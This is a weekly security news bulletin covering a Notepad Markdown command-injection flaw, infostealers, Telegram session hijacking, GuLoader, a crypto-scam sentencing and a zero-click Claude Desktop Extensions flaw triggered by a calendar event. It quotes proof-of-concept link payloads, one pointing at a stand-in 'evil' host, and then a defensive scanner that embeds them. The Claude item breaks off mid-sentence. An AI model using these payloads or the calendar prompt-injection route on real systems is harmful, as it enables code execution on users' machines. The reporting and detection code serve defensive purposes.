
HIGH | News | The Hacker News

ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories

  • What: The Hacker News' weekly ThreatsDay bulletin (Feb 12, 2026), summarizing the week's notable threats and trends.
  • Impact: The bulletin's through-line is attackers leaning on tools and workflows that already work: initial access is getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent.

Ravie Lakshmanan | Feb 12, 2026 | Cybersecurity / Hacking News

Threat activity this week shows one consistent signal: attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight.

Another shift is how access is gained versus how it is used. Initial entry points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent. The objective is less about disruption and more about staying embedded long enough to extract value.

There is also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable.

Below is this week's ThreatsDay Bulletin, a tight scan of the signals that matter, distilled into quick reads. Each item adds context to where threat pressure is building next.

Notepad RCE via Markdown Links: Microsoft Patches Notepad Flaw

Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS score: 8.8) in its Notepad app that could result in remote code execution. "Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network," Microsoft said. An attacker could exploit the flaw by tricking a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch the file the link points to, including remote files. "The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user," the tech giant added.

Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with "file://" links that point to executable files ("file://C:/windows/system32/cmd.exe") or that use special URI schemes ("ms-appinstaller://?source=https://evil/xxx.appx") to run arbitrary payloads. Exploitation still requires a click, and the payload runs with the victim's privileges rather than elevated ones. The issue was fixed as part of Microsoft's monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 in May 2025.

APT Pressure Intensifies on Taiwan: Taiwan Becomes Target of APT Attacks

TeamT5 said it tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, of which 173 targeted Taiwan. "Taiwan's role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives," the security vendor said. "Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments."

Node.js Stealer Hits Windows: LTX Stealer Targets Windows Systems

A new Node.js information stealer named LTX Stealer has been spotted in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration. "The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details," CYFIRMA said.

Marco Stealer Expands Data Theft: Marco Stealer Emerges in the Wild

Another new Windows-oriented information stealer is Marco Stealer, first observed in June 2025. Delivered via a downloader in a ZIP archive, it mainly targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim's system. "Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker," Zscaler ThreatLabz said. "Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests."

Telegram Sessions Hijacked via OAuth Abuse: Social Engineering Campaign Targets Telegram Accounts

A new account takeover campaign has been observed abusing Telegram's native authentication workflows to obtain fully authorized user sessions. In one variant, victims are prompted to scan a QR code on a bogus site using the Telegram mobile application, which initiates a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim's existing session. In the other variant, users enter their country code, phone number, and verification code (if enabled) on a fake web page, and the data is relayed to Telegram's official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before. Because every step goes through Telegram's real infrastructure, the one thing the victim sees that is out of place is an authorization prompt for a login they did not mean to start, which is also the point at which the takeover can still be refused. "Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram's legitimate login and authorization infrastructure," CYFIRMA noted. "By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion."

Discord Expands Global Age Checks: Discord Announces Age Verification Plans

Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content. Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult without always requiring users to verify their age. The company has assured users that video selfies do not leave the user's device, that identity documents submitted to third-party vendors (in this case k-ID) are "deleted quickly" or "immediately" after age confirmation, and that a user's age verification status cannot be seen by other users. However, concerns have been raised about whether Discord can be trusted with users' most sensitive information, especially in the aftermath of a security breach at a third-party service that Discord previously relied on to verify ages in the U.K. and Australia. That incident led to the theft of government IDs belonging to 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third parties store personal data shared during age checks. The move comes at a time when laws requiring age verification on social media platforms are being adopted across the world. Discord confirmed that "a phased global rollout" would begin in "early March," at which point all users globally would be defaulted to "teen-appropriate" experiences.

GuLoader Refines Evasion Tradecraft: GuLoader Continues to Evolve

A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive. First observed in December 2019, GuLoader serves primarily as a downloader for remote access trojans (RATs) and information stealers.

$73.6M Pig-Butchering Scam Sentence: Man Sentenced to 20 Years in Prison for Crypto Scam

Daren Li, 42, a dual national of China and St. Kitts and Nevis, has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme, known as pig butchering or romance baiting, that defrauded victims of more than $73.6 million. Li pleaded guilty in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025; his present whereabouts are unknown. "As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services," the U.S. Justice Department said. "The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications." The co-conspirators set up spoofed domains and websites resembling legitimate cryptocurrency trading platforms and, after gaining victims' trust, tricked them into investing through these fraudulent platforms. Li also admitted that he directed co-conspirators to open U.S. bank accounts on behalf of 74 shell companies and monitored the receipt of interstate and international wire transfers of victim funds. "Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency," the department said.

0-Click AI Prompt RCE Risk: 0-Click Flaw in Claude Desktop Extensions

A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system via a simple Google Calendar event when a user issues a harmless prompt like "Please check my latest events in google cal[endar] and then take care of it for me." The problem stems from how MCP

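Returning to the Notepad item: the PoC shapes described there (a "file://" link to an executable, or an "ms-appinstaller://" URI) are easy to spot before a user ever opens the file. The scanner below is an added example written for this bulletin; it is not Microsoft's code and not a detection published with the PoCs. It pulls link targets out of the three CommonMark link forms (inline links, reference definitions, autolinks) and labels anything that is not a plain web or relative link. It goes a little beyond the PoC by flagging other local-handler URI schemes as well; that scheme list and the executable-suffix list are assumptions chosen for illustration, and the sample Markdown is constructed.

```python
"""Triage scanner for Markdown files carrying the kind of link targets used
against Notepad in CVE-2026-20841: file:// links to executables and
app-launching URI schemes such as ms-appinstaller://.

Added example, not Microsoft's code. LAUNCH_SCHEMES, EXEC_SUFFIXES and the
SAMPLE document are assumptions constructed for illustration.
"""
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Schemes that hand the target to a local handler rather than a browser.
# Assumed list for this example; extend it for your environment.
LAUNCH_SCHEMES = {"file", "ms-appinstaller", "ms-msdt", "search-ms", "ms-cxh"}

# File types Windows will execute or install when a file:// link is opened.
EXEC_SUFFIXES = (".exe", ".cmd", ".bat", ".ps1", ".msi", ".msix", ".appx",
                 ".appinstaller", ".scr", ".hta", ".js", ".vbs", ".lnk")

# The three places CommonMark puts a link target: inline links/images,
# reference definitions, and autolinks. Only the target is captured.
INLINE = re.compile(r"!?\[[^\]]*\]\(\s*<?([^\s)>]+)>?(?:\s+[\"'(][^)]*)?\)")
REFDEF = re.compile(r"^\s{0,3}\[[^\]]+\]:\s*<?([^\s>]+)>?", re.MULTILINE)
AUTOLINK = re.compile(r"<([A-Za-z][A-Za-z0-9+.-]{1,31}:[^\s<>]+)>")


def extract_targets(markdown: str) -> List[str]:
    """Return every link target, grouped by link form, without duplicates."""
    found = []
    for rx in (INLINE, REFDEF, AUTOLINK):
        found.extend(m.group(1) for m in rx.finditer(markdown))
    return list(dict.fromkeys(found))


def classify(target: str) -> Optional[str]:
    """Label a risky target, or return None for ordinary web/relative links."""
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    if scheme in ("", "http", "https", "mailto"):
        return None
    if scheme == "file":
        # urlsplit puts a drive letter in netloc for the file://C:/... form,
        # so join netloc and path before checking the suffix.
        path = (parts.netloc + parts.path).lower()
        if path.endswith(EXEC_SUFFIXES):
            return "file-link-to-executable:" + target
        return "file-link:" + target
    if scheme in LAUNCH_SCHEMES:
        return "launch-scheme:" + scheme
    return "non-web-scheme:" + scheme


def scan(markdown: str) -> List[str]:
    """All findings for one Markdown document."""
    return [f for f in map(classify, extract_targets(markdown)) if f]


# Constructed sample mimicking the PoC link shapes described in the bulletin.
SAMPLE = """# Quarterly notes

See the [shared folder](file://C:/windows/system32/cmd.exe) for details.
Install the [viewer](ms-appinstaller://?source=https://evil/xxx.appx) first.
Normal [docs](https://learn.microsoft.com/) and a [local page](./page.md).

[ref]: <file:///C:\\Users\\Public\\notes.txt>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Pointed at a directory of .md attachments or a mail-gateway quarantine, this gives a quick triage list: a Markdown file rarely has a legitimate reason to launch a local handler, so anything beyond http, https, mailto or a relative path deserves a look. The regexes cover the CommonMark link forms but not raw HTML anchors embedded in Markdown, which a stricter pass would also need to parse, and none of this replaces applying the February update.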